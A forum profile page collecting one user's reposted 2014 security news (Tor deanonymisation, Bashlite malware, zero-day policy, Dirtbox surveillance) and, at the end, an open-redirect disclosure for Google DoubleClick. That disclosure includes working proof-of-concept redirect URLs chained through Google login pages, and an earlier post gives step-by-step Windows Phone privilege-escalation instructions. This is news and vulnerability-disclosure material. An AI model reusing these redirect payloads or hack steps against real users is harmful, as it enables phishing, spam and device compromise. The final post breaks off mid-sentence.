akkiliON (Active Members, 1202 posts, 61 days won)

Everything posted by akkiliON

  1. Tor has been a tough target for law enforcement for years, and the FBI has spent millions of dollars to de-anonymize the identity of Tor users, but the latest research suggests that more than 81% of Tor clients can be "de-anonymised" by exploiting the traffic analysis software ‘NetFlow’ technology that Cisco has built into its router protocols. NetFlow is a network protocol designed to collect and monitor network traffic. It exchanges data in network flows, which can correspond to TCP connections or other IP packets sharing common characteristics, such as UDP packets sharing source and destination IP addresses, port numbers, and other information. The research was conducted for six years by professor Sambuddho Chakravarty, a former researcher at Columbia University’s Network Security Lab and now researching Network Anonymity and Privacy at the Indraprastha Institute of Information Technology in Delhi. Chakravarty used a technique to determine the Tor relays which involved a modified public Tor server running on Linux, accessed by the victim client, and a modified Tor node that can form one-hop circuits with arbitrary legitimate nodes. According to the research paper, to carry out large-scale traffic analysis attacks in the Tor environment one would not necessarily need the resources of a nation state; even a single AS may observe a large fraction of entry and exit node traffic. As stated in the paper, a single AS (Autonomous System) could monitor more than 39% of randomly-generated Tor circuits. The technique depends on injecting a repeating traffic pattern into the TCP connection that it observes as originating from the target exit node, and then correlating the server’s exit traffic for the Tor clients, as derived from the router’s flow records, to identify the Tor client. Tor is vulnerable to this kind of traffic analysis because it is designed as a low-latency anonymous communication network.
Chakravarty’s research on traffic analysis doesn't need hundreds of millions of dollars in expense, nor did it need the infrastructural efforts that the NSA put into their FoxAcid Tor redirects; however, it benefits from running one or more high-bandwidth, high-performance, high-uptime Tor relays. Just a few days ago, US and European authorities announced the seizure of 27 different websites as part of a much larger operation called Operation Onymous, which led to the take-down of more than "410 hidden domains" that sell illegal goods and services from drugs to murder-for-hire assassins by masking their identities using the Tor encryption network. Source: http://thehackernews.com/2014/11/81-of-tor-users-can-be-easily-unmasked_18.html
  2. Do you wanna hack a Nokia Lumia phone running the latest mobile operating system Windows 8.1?? Hackers have made it very easy for you all..!! Just a few weeks after Microsoft announced that a 19-year-old critical security hole existed in almost every version of its Windows operating system, XDA-developers have discovered a new vulnerability in Microsoft’s youngest OS Windows 8.1 that could easily be exploited by hackers to hack a Nokia Lumia phone. An XDA Developers hacker who goes by the name DJAmol has found a wide open hole in OS Windows Phone 8.1 which makes the operating system very easy to hack. The vulnerability allows attackers to run their application with another user's privileges and edit the registry. DJAmol realized that simply by replacing the contents of a trusted OEM app that has been transferred over to the SD card, the app will inherit the privileges of the original app. Once done, an attacker could then delete the existing directory and create a new directory with the same name as the original App. As a result, the third party registry editor app will gain full access to the Info and Settings in the app itself. This is how the hack can be implemented in a few simple steps prescribed by XDA-developers in a blog post. Develop your own application package and deploy it on the target device. Install any application such as “Glance Background Beta” from the Windows Phone app Store. Delete all folders under the targeted directory of the installed app, in this case, Glance background. Now copy the contents of your own deployed package and paste it on the targeted directory. This implies replacing the “Program Files” of the installed app with your package files. Finally launch the App, which will run in the OEM (Glance Background beta) directory using the privileges of the targeted App. The hack is very simple and easy to implement because all it needs is an application from the Windows app store.
But thankfully, the hack has not yet escalated to a full interop unlock, as the applications which are allowed to be moved to the SD card have limited access. The XDA developers forum reported the vulnerability to Microsoft and also warned them that the vulnerability could give higher privileges to the attackers if tried using a First Party Application rather than a third-party app. For now, we can just wait for a response from Microsoft’s part to prevent it from getting more serious. Source: http://thehackernews.com/2014/11/windows-phone-81-hacked.html
  3. Sony is offering a few brief details about the next camera sensor that will equip the new generations of Sony phones and tablets. This sensor brings major improvements and will also be available to other phone and tablet manufacturers from 2015. The sensor, named Exmor RS IMX230, has a size of 1/2.4 inch, a resolution of 21 MP and is the first CMOS with an HDR function. This sensor will be able to film 4K with HDR, integrates Plane Phase Detection Autofocus technology to focus faster on moving objects, and has 192 autofocus points. It is similar to the sensors found in mirrorless cameras, supports the RAW format, and will be available to all manufacturers from April 2015. Until then, rumours say this new sensor will be integrated into the Xperia Z4. Source: Sony introduce senzor foto CMOS pe smartphone-uri si tablete | Arena IT
  4. THE US GOVERNMENT HACKS reported recently were more serious than at first thought. The attacks, which started at the end of October, were originally believed to have been directed solely at the White House, taking email systems offline and making external internet access spotty. But Nextgov now reports that the State Department's servers were attacked at the same time. Both systems remain under attack, which has now led to the servers being suspended while security upgrades take place. It is suspected that Russian, or possibly Chinese, hackers employed by the state are responsible, but the US has played down such concerns, stating that the attacks are on unclassified servers. Neither party has claimed responsibility and no-one from the US government is willing to do more than speculate that this is the cause. "The department recently detected activity of concern in portions of its unclassified email system," said a State Department official. "There was no compromise of any of the department's classified systems." The statement goes on to confirm that security upgrades are taking place during a scheduled outage as a result of the attacks. Since the initial attack, other non-critical government systems, including those of the US post office and US weather service, are said to have been targeted. Systems at the State Department will be restored "soon", which will be a relief to employees who may otherwise discover what we did on Monday mornings before computers. Attacks on US government servers are a daily occurrence, but this attack seems to be the most sustained yet by a state-sanctioned group. Russia and China are viable culprits. Already this year Russian hackers have stolen a billion email addresses, while China announced that it will move to its own operating system by 2020 to negate a perceived threat from the US-based Windows. Source: US State Department systems taken offline after more foreign state hacks - The Inquirer
  5. White House Cybersecurity Policy Coordinator Michael Daniel listens to questions during the Reuters Cybersecurity Summit in Washington, May 14, 2013. Jonathan Ernst/Reuters/Corbis
For years the government has refused to talk about or even acknowledge its secret use of zero-day software vulnerabilities to hack into the computers of adversaries and criminal suspects. This year, however, the Obama administration finally acknowledged in a roundabout way what everyone already knew—that the National Security Agency and law enforcement agencies sometimes keep information about software vulnerabilities secret so the government can exploit them for purposes of surveillance and sabotage. Government sources told the New York Times last spring that any time the NSA discovers a major flaw in software it has to disclose the vulnerability to the vendor and others so that the security hole can be patched. But they also said that if the hole has “a clear national security or law enforcement” use, the government can choose to keep information about the vulnerability secret in order to exploit it. This begged the question about just how many vulnerabilities the government has withheld over the years to exploit. In a new interview about the government’s zero-day policy, Michael Daniel, National Security Council cybersecurity coordinator and special adviser to the president on cybersecurity issues, insists to WIRED that the government doesn’t stockpile large numbers of zero days for use. “[T]here’s often this image that the government has spent a lot of time and effort to discover vulnerabilities that we’ve stockpiled in huge numbers … The reality is just not nearly as stark or as interesting as that,” he says. Zero-day vulnerabilities are software security holes that are not known to the software vendor and are therefore unpatched and open to attack by hackers and others. A zero-day exploit is the malicious code crafted to attack such a hole to gain entry to a computer.
When security researchers uncover zero-day vulnerabilities, they generally disclose them to the vendor so they can be patched. But when the government wants to exploit a hole, it withholds the information, leaving all computers that contain the flaw open to attack—including U.S. government computers, critical infrastructure systems and the computers of average users. Daniel says the government’s retention of zero-days for exploitation is the exception, not the rule, and that the policy for disclosing zero-day vulnerabilities by default—aside from special-use cases—is not new but has been in place since 2010. He won’t say how many zero-days the government has disclosed in the four years since the policy went into effect or how many it may have been withholding and exploiting before the policy was established. But during an appearance at Stanford University earlier this month, Admiral Mike Rogers, who replaced retiring Gen. Keith Alexander as the NSA’s new director last spring, said that “by orders of magnitude, the greatest numbers of vulnerabilities we find, we share.” That statement, however, appears to contradict what a government-appointed review board said last year. So WIRED spoke with Daniel in an effort to get some clarity on this and other questions about the government’s zero-day policy.
Timeline of Policy in Question
Last December, the President’s Review Group on Intelligence and Communications Technologies seemed to suggest the government had no policy in place for disclosing zero days when it recommended in a public report that only in rare instances should the U.S. government authorize the use of zero-day exploits, and then only for “high priority intelligence collection.” The review board, convened by President Obama in the wake of Edward Snowden’s revelations about the NSA’s surveillance activities, produced its lengthy report (.pdf) to provide recommendations for reforming the intelligence community’s activities.
The report made a number of recommendations on various topics, but the one addressing zero-days was notable because it was the first time the government’s use of exploits was acknowledged in such a forum. The review board asserted that “in almost all instances, for widely used code, it is in the national interest to eliminate software vulnerabilities rather than to use them for US intelligence collection.” The board also said that decisions about withholding a vulnerability for purposes of exploitation should only be made “following senior, interagency review involving all appropriate departments.” And when the government does decide to withhold information about a zero-day hole to exploit it, that decision should have an expiration date. Obama appeared to ignore the board’s recommendations when, a month later, he announced a list of NSA reforms that contained no mention of zero days or the government’s policy about using them. It wasn’t until the Heartbleed vulnerability was discovered in April, and a news report falsely claimed the NSA had known about the flaw and kept silent about it to exploit it, that the administration finally went public with a formal statement about its zero-day policy. In addition to comments given to the Times announcing the default disclosure policy, Daniel published a blog post stating that the White House had also “re-invigorated” its process for implementing this “existing policy.” The statements, however, raised more questions than they answered. Was this a new policy or had the government been disclosing vulnerabilities prior to this announcement? What did “reinvigorated” mean? And did the policy apply equally to zero-day vulnerabilities that the government purchased from contractors or just ones that the NSA itself discovered? 
Daniel says although the default-disclosure policy was established in 2010 it “had not been implemented to the full degree that it should have been,” hence the government’s use of the term “reinvigorated” to describe this new phase. The relevant agencies, he says, “had not been doing sufficient interagency communications and ensuring that everybody had the right level of visibility across the entire government” about vulnerabilities that were discovered. What this means is that although “they probably were disclosing the vulnerability” by default, they “may not have been communicating that to all the relevant agencies as regular as they should have been.” Agencies, he says, might have been communicating “at the subject-matter expert level,” but the communication may not have been happening as consistently, in as coordinated a fashion or within the timelines that the policy dictated. This was the part, he says, that was “reinvigorated” this year “to make sure it was actually happening consistently and as thoroughly as the policy called for.” Daniel didn’t say exactly when in 2010 the policy was initiated or what prompted it, but 2010 is the year the Stuxnet virus/worm was discovered infecting machines in Iran. Stuxnet was a digital weapon reportedly designed by the U.S. and Israel to sabotage centrifuges enriching uranium for Iran’s nuclear program. It used five zero-day exploits to spread, one of which was a fundamental vulnerability in the Windows operating system that affected millions of machines around the world, yet information about the vulnerability was kept secret so the U.S. and Israel could use it to spread Stuxnet on machines in Iran. Asked why, if the policy had been in place since 2010 the review board didn’t seem to know about it when they made their recommendations last December, Daniel says he didn’t know. 
So WIRED contacted Peter Swire, a member of the review board and a professor of law and ethics at the Georgia Institute of Technology, to clarify if the group had been briefed on the existing zero-day policy before they wrote their report. Swire says they had, but parsed his words carefully as he explained that the group’s recommendations to the president stemmed from the fact that the policy wasn’t being implemented as the board thought it should, noting that certain presumptions about the existing policy needed to be clarified and strengthened. “A presumption might mean you take action 55 percent of the time [to disclose a vulnerability] or a presumption might mean we do it 99 percent of the time,” Swire says. “A 99 percent presumption is a much stronger presumption; it means exceptions are much less frequent…. Our recommendation was to have significantly fewer exceptions.” The group also recommended, he says, a shift in the “equities” process—the process used to determine when a vulnerability is withheld and when it is disclosed—from the NSA to the White House, implying that until this year the NSA or the intelligence community had been the sole arbiter of decisions about the use of zero-day vulnerabilities and exploits. The review board had recommended that the National Security Council have an oversight role in this process, and Daniel confirmed to WIRED that his office now oversees the process. So it appears that although Obama didn’t publicly acknowledge the review board’s recommendations when he announced his reforms of the NSA last January, he did in fact implement their two recommendations about the government’s handling of zero days—by strengthening the default presumption for disclosing zero days and giving someone other than the NSA authority over deciding when to disclose or withhold zero days.
On How the Interagency Equities Process Works
Daniel wouldn’t go into detail about the equities process or who is involved in it other than to say “the agencies that you would expect” use a “multi-factor test” to examine vulnerabilities to determine how extensively the software is used in critical infrastructure and US government systems, and how likely it is that malicious actors have already got ahold of it or may get hold of it. “All of those questions that are laid out, we require that analysis and discuss each one of those points. Then groups of subject-matter experts across the government make a recommendation to this interagency group that I chair here on the National Security Council.” The subject-matter experts provide “their best judgment about its widespreadness or how likely it is that researchers are going to be able to discover it or how unlikely it is that a foreign adversary has it.” He reiterated that the government’s default position would be to disclose but that there “are a limited set of vulnerabilities that we may need to retain for a period of time in order to conduct legitimate national security intelligence and law enforcement missions.” He wouldn’t say what the period of time would be for withholding information about vulnerabilities to exploit them before disclosing them but says it “is not one that lasts in perpetuity. In fact the policy actually says that we must regularly review a decision to retain a vulnerability and make sure that all the factors that I mentioned before still hold.” That review, he says, happens several times a year. “So the situation may change and we may decide at that point that it’s time to actually disclose the vulnerability,” he notes.
On Stockpiling Vulnerabilities
Daniel would not say how many vulnerabilities the government has disclosed or retained so far, but he denied that it maintains a vast repository of zero days.
“What we can say is that the overwhelming majority of those that we find we do disclose,” he notes, echoing the words Rogers had used. “The idea that we have these vast stockpiles of vulnerabilities stored up—you know, Raiders of the Lost Ark style—is just not accurate. So the default position really is that we disclose most of the vulnerabilities that we find to the vendors. We just don’t take credit for it for a variety of reasons and have no desire to take credit for it.” Asked if the disclosure policy also applies to zero-day vulnerabilities and exploits the government purchases from contractors and independent sellers, Daniel says it does. “It’s difficult for me to talk about where we might find the vulnerabilities or the source of the vulnerabilities that the US government comes across because of course a lot of that is classified,” he says. “But the policy remains that our default position is going to be and our strong bias is going to be that we will disclose vulnerabilities to vendors. If you picked an economy that was digitally dependent, the United States is certainly at the top of the list, right? So it’s highly likely that we are going to face a situation where a vulnerability would be something that we would be concerned about from a network defense standpoint. So it shouldn’t be surprising that our bias is going to be towards disclosing it.” How exactly this would work, however, is unclear. The government doesn’t necessarily own the information and code it purchases from vendors. Not every exploit sold is purchased under an exclusivity agreement. Sellers may also ask the government to sign an NDA related to a sale. Daniel replied that it made perfect sense to purchase some vulnerabilities to disclose if, for example, the government learned that someone was peddling a vulnerability that affected a lot of critical infrastructure networks and the government wanted to take it off the market and get it fixed.
“I’m not saying that would be the primary method or even the most desirable method, but it is certainly one that you could contemplate the US government pursuing if we thought the vulnerability was significant enough for us to try to get it patched,” he says. But it’s unclear how the default disclosure process applies when the government is also purchasing vulnerabilities from vendors specifically to exploit them. What would be the point of spending U.S. tax dollars on a vulnerability only to burn it by disclosing it? Daniel sidestepped the question, saying, “[T]here’s often this image that the government has spent a lot of time and effort to discover vulnerabilities that we’ve stockpiled in huge numbers and similarly that we would be purchasing very, very large numbers of vulnerabilities on the open market, the gray market, the black market, whatever you want to call it. And I think the reality is just not nearly as stark or as interesting as that, and that the numbers are just not anywhere near what people believe they are….” Source: U.S. Gov Insists It Doesn't Stockpile Zero-Day Exploits to Hack Enemies | WIRED
  6. Cyber criminals are using new malware variants that exploit the GNU Bash vulnerability referred to as ShellShock (CVE-2014-6271) in order to infect embedded devices running BusyBox software, according to a researcher. A new variant of "Bashlite" malware targeting devices running BusyBox software was spotted by the researchers at Trend Micro shortly after the public disclosure of the ShellShock vulnerability. BusyBox provides a set of command line utilities that are specifically designed to run in constrained embedded environments. At compile time, different capabilities can be left out, reducing the size of the binaries, and efforts are made to make them memory efficient. This makes the software an excellent candidate for use in consumer electronics devices, which seem to have been the items of interest in this case. The malware variant, detected as ELF_BASHLITE.A (ELF_FLOODER.W), when executed on a victim's machine, scans compromised networks for devices such as routers and Android phones running BusyBox to brute force logins through a preset list of usernames and passwords. The variant would then run a command to download and run the bin.sh and bin2.sh scripts to gain control over BusyBox systems once a connection was established. Therefore, this newer version of Bashlite is designed not only to identify systems running BusyBox, but also to hijack them. Miscreants attempted to log in using a predefined list of usernames which include 'root', 'admin' and 'support' and a list of common and default passwords such as 'root,' 'admin,' '12345,' 'pass,' 'password,' '123456' and so on. Trend Micro's Inocencio urged users to change their default usernames and passwords in order to stay on the safer side, and also to disable remote shells, if possible, to avoid their exploitation.
Bashlite malware includes the payload of the ShellShock exploit code, and threat actors have used this critical ShellShock Bash command vulnerability (CVE-2014-6271) to build botnets from hijacked devices, launch distributed denial-of-service (DDoS) attacks, and target network attached storage boxes among other exploits. The critical ShellShock Bash bug was disclosed on September 24, and by September 30 security firms estimated that attacks using the exploit could top 1 billion, and more than 1000 organizations patched the ShellShock bug as fixes became available. Source: BASHLITE Malware leverages ShellShock Bug to Hijack Devices Running BusyBox
  7. That's what I was thinking too.
  8. The founder of the bitcoin ATM firm Mr Bitcoin has embedded a tiny chip in his hands to keep his digital currency safe, which also gives him an in-body set of keys and an alarm clock. Dutch entrepreneur Martijn Wismeijer has had an NFC (near-field communication) chip injected into each hand between the muscle and skin tissue. The ultra-cautious Mr Wismeijer says it’s crucial to get the chips encrypted to prevent theft, although actually stealing the chips would be tricky, bloody and painful for their owner. Each chip, manufactured from glass, is 2mm x 12mm, and can hold up to 888 bytes of programmable memory, the equivalent of about 26 condensed bitcoin private keys. “I did it because I wanted to experiment with strong bitcoins using subdermal implants because that’s what I thought would be the Holy Grail of contactless payments,” he told the IBTimes. But Mr Wismeijer found that the microchips could be used for a number of other things and can be read by smartphones like the Apple iPhone 6 and the Samsung Galaxy S5. “I found you can use them for lots of different things, even as an alarm snooze button. To switch off my alarm I need to scan either one or two of the implants, so this way it takes a little bit of fiddling so you never oversleep again,” he said. Wismeijer also hopes to get a special door lock fitted to his house, which will allow him to do away with keys by touching his palm on the door frame to enter. “I thought that if the storage is limited then there's no point in just getting one if I could have two, because with one I could store private information like cryptocurrency or two-factor authentication for passwords, while the other one I could use for public things like my emergency contacts or my business card," he said.
No pain no gain
Wismeijer does not recommend people try and install it in their bodies themselves. “Most doctors will not want to install the implant so a body manipulation artist (preferably not just a tattoo artist or piercer) will be your next best bet, but make sure they work according to strict hygiene codes and know what they are doing,” he told the Telegraph. The pain lasts only for a day, he said. When asked, mainly by older people, why he bothers to go to such lengths, Wismeijer says it’s all in the name of progress. He hopes that in the not too distant future we will be able to have more complex chips fitted into our bodies that will be able to monitor things like heart rate and glucose levels. Source: http://rt.com/news/204315-implant-bitcoin-wallet-skin/
  9. The U.S. government is reportedly using spy airplanes equipped with special military-grade snooping equipment to eavesdrop on cell phone information from millions of smartphone users in the U.S., according to a new report. This little device, nicknamed "Dirtbox", is being used to mimic mobile phone tower transmissions from the sky and gather data from millions of mobile phones, helping the US Marshals Service track criminals while recording innocent citizens’ information. The purpose of the device is supposedly to track a specific target, but if active, all mobile devices in the particular area will respond to the signal. The Dirtbox causes smartphones to transmit back the users’ location, registration information and identity data – the uniquely identifying IMEI numbers stored in every mobile device, The Wall Street Journal reported. The name Dirtbox is given after the initials of Digital Receiver Technology, Inc. (DRT), a Boeing Company subsidiary that allegedly manufactures these devices. These two-foot-square snooping devices imitate cellphone towers and thus make contact with all handsets in range. The operation began in 2007 and according to the WSJ, a "source familiar with the program" said that these devices are fitted onto Cessna aircraft and fly from at least five metropolitan airports in the US. The planes cover the majority of the US population. The dirtboxes operate in the same way as the so-called mobile phone surveillance tools IMSI (International mobile subscriber identity) catchers or Stingrays, which have been in use by over 46 agencies including law enforcement, the military, and intelligence agencies across 18 states and Washington, D.C. for more than a decade. StingRays are common surveillance devices that allow law enforcement to mimic a cell phone tower, and track the position of users who connect to it, and sometimes even intercept calls and Internet traffic, send fake texts, install spyware on a phone, and determine precise locations.
Both Stingrays and Dirtboxes make use of "off-the-shelf" components to gather mobile phones’ International Mobile Subscriber Identity (IMSI), which is a code unique to each device. They can be used to track individuals’ movements via their mobile phone devices but work indiscriminately, hoovering up information from a general area. The US Department of Justice – which oversees the marshal service – has neither confirmed nor denied the existence of the Dirtbox program, but anonymous sources familiar with their use said the flying spies-in-the-sky were technically above board. The WSJ quotes one source as stating, "What is done on US soil is completely legal….., Whether it should be done is a separate question." Source: http://thehackernews.com/2014/11/spy-planes-equipped-with-dirtbox.html
  10. The bugs in the payment system could let attackers get at the contents of a phone
Several bugs in Near Field Communication (NFC) payment systems have been found by security experts. NFC allows people to pay for goods and services by touching their handset to a payment terminal. But the inclusion of the technology on phones has proved useful to hackers seeking a stealthy way to take over a mobile phone. In most cases the bugs would give an attacker complete access to a device's data. The security experts demonstrated the weaknesses in NFC technology at an event in Tokyo organised by Hewlett Packard. Called Mobile Pwn2Own, the competition involves researchers and developers using bugs in an attempt to subvert a series of handsets. A prize pool of $425,000 (£271,000) was available to those who managed to get access to a handset's innards via a bug they had found. Entrants would get a slice of that cash by taking less than 30 minutes to carry out a successful attack via a previously unknown vulnerability. Eight separate devices, including an Apple iPhone, Blackberry Z30, Amazon Fire phone and Google Nexus 7, were the targets for the security experts. On the first day of the two-day competition five teams successfully used the bugs they had found to take over five devices. Three of the successes exploited NFC to give the attackers the ability to extract data at will from the phones. The other two attacks compromised a phone via its on-board web browser. UK security expert Adam Laurie, Japan's Team MBSD and South Africa's MWR InfoSecurity were among the prize winners. The Apple iPhone 5S, Samsung Galaxy 5, LG Nexus 5 and Amazon Fire Phone were all successfully compromised. Details of the vulnerabilities have now been shared with the makers of the handsets so that the bugs can be patched and fixed. Source: BBC News - Hackers exploit NFC phone payment technology
  11. Google DoubleClick.net (Advertising) System URL Redirection Vulnerabilities Can be Used by Spammers

Although Google does not include Open Redirect vulnerabilities in its bug bounty program, its preventive measures against Open Redirect attacks have been quite thorough and effective to date. However, Google might have overlooked the security of its DoubleClick.net advertising system. After some tests, it was found that most of the redirection URLs within DoubleClick.net are vulnerable to Open Redirect vulnerabilities. Many redirections are likely to be affected. These redirections can be easily used by spammers, too.

Some URLs belonging to Googleads.g.Doubleclick.net are vulnerable to Open Redirect attacks, too, while Google prevents similar URL redirections on domains other than Googleads.g.Doubleclick.net. Attackers can use URLs related to Google Account to make the attacks more powerful. Moreover, these vulnerabilities can be used to attack other companies such as Google, eBay, The New York Times, e.g. by bypassing their Open Redirect filters (Covert Redirect).

*(1) Background Related to Google DoubleClick.net.*

*(1.1) What is DoubleClick.net?*
"DoubleClick is the ad technology foundation to create, transact, and manage digital advertising for the world's buyers, creators and sellers."
http://www.google.com.sg/doubleclick/

*(1.2) Reports Related to Google DoubleClick.net Used by Spammers*

*(1.2.1)* Google DoubleClick.net has been used by spammers for a long time. The following is a report from 2008.
"The open redirect had become popular with spammers trying to lure users into clicking their links, as they could be made to look like safe URLs within Google's domain."
https://www.virusbtn.com/blog/2008/06_03a.xml?comments

*(1.2.2)* Mitechmate published a blog post related to DoubleClick.net spam in 2014.
"Ad.doubleclick.net is recognized as a perilous adware application that causes unwanted redirections when surfing on the certain webpages. Actually it is another browser hijacker that aims to distribute frauds to make money. Commonly people pick up Ad.doubleclick virus when download softwares, browse porn site or read spam email attachments. It enters into computer sneakily after using computer insecurely. Ad.doubleclick.net is not just annoying, this malware traces users' personal information, which would be utilized for cyber criminal."
http://blog.mitechmate.com/remove-ad-doubleclick-net-redirect-virus/

*(1.2.3)* Malwarebytes posted a news item related to DoubleClick.net malvertising in 2014.
"Large malvertising campaign under way involving DoubleClick and Zedo"
https://blog.malwarebytes.org/malvertising-2/2014/09/large-malvertising-campaign-under-way-involving-doubleclick-and-zedo/

*(2) DoubleClick.net System URL Redirection Vulnerabilities Details.*

These vulnerabilities can be attacked without user login. Tests were performed on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.

The webpage used for the following tests is "http://www.tetraph.com/security". We can suppose that this webpage is malicious.

*(2.1) Vulnerable URLs Related to Googleads.g.Doubleclick.net.*

*(2.1.1)* Some URLs belonging to googleads.g.doubleclick.net are vulnerable to Open Redirect attacks, while Google prevents similar URL redirection on domains other than googleads.g.doubleclick.net.
Vulnerable URLs: http://googleads.g.doubleclick.net/aclk?sa=L&ai=CWEQH6Q73UqW9CMvMigfdiIGoB9rlksIEAAAQASAAUO7kr-b8_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEggFP0E-9agyjXkIfjOxmtpPE76hNCBn1in_meKMn53O-8ZFlbxWDgYdaVZQKJza8mIRXw22hWIVMAOJJzq-S6AipWHe9iVZCAAlcHj-gT2B33tD9a2oQrZ61S3-WFh_8T8RFUFnC_PRC35CTFbueQrUYjC-j6ncVXzt_IPXugo5vE-3x4AQBoAYV&num=0&sig=AOD64_2petJH0A9Zjj45GN117ocBukiroA&client=ca-pub-0466582109566532&adurl=http://www.sharp-world.com/igzo http://googleads.g.doubleclick.net/aclk?sa=L&ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV&num=0&sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ&client=ca-pub-0466582109566532&adurl=http://economics.wj.com POC: http://googleads.g.doubleclick.net/aclk?sa=L&ai=CWEQH6Q73UqW9CMvMigfdiIGoB9rlksIEAAAQASAAUO7kr-b8_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEggFP0E-9agyjXkIfjOxmtpPE76hNCBn1in_meKMn53O-8ZFlbxWDgYdaVZQKJza8mIRXw22hWIVMAOJJzq-S6AipWHe9iVZCAAlcHj-gT2B33tD9a2oQrZ61S3-WFh_8T8RFUFnC_PRC35CTFbueQrUYjC-j6ncVXzt_IPXugo5vE-3x4AQBoAYV&num=0&sig=AOD64_2petJH0A9Zjj45GN117ocBukiroA&client=ca-pub-0466582109566532&adurl=http://www.tetraph.com/security http://googleads.g.doubleclick.net/aclk?sa=L&ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV&num=0&sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ&client=ca-pub-0466582109566532&adurl=http://www.tetraph.com/security Attackers can make use of the following URLs to make the attacks more powerful, i.e. 
https://www.google.com/accounts/ServiceLogin?continue=https%3A%2F%2Fsites.google.com%2Fsite%2Fissrabhi%2Fhome&service=jotspot&passive=true&ul=1 https://accounts.google.com/accounts/SetSID?ssdc=1&sidt=*&continue=http%3A%2F%2Fwww.orkut.com%2FRedirLogin%3Fmsg%3D1%26auth%3D* POC: https://www.google.com/accounts/ServiceLogin?continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.tetraph.com%2Fessaybeans%2Freflections%2Fsolitude.html https://accounts.google.com/accounts/SetSID?ssdc=1&sidt=*&continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.diebiyi.com%2Farticles *(2.1.2)* While Google prevents similar URL redirection other than googleads.g.doubleclick.net , e.g. 
